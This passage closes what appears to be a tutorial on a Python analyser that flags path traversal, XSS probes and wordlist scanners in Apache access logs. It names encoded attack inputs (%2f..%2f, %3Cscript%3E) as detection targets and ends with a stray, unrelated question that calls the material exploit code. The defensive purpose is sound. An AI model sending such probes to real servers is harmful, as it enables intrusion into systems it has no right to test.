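    for a in result["alerts"]:
        print(a["ip"], a["ts"], ",".join(a["tags"]), a["path"])
    print("probable wordlist scanners:", result["scanners"])
```

Apache records the request line as received, so decoding once before matching is what makes %2f..%2f and %3Cscript%3E visible to the traversal and XSS rules. On a real log a threshold of around 50 not-found responses per client is a sensible starting point for the scanner heuristic; the demo lowers it only because the constructed sample contains two such lines.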

The end

Is it normal for exploit code to have no trailing newline?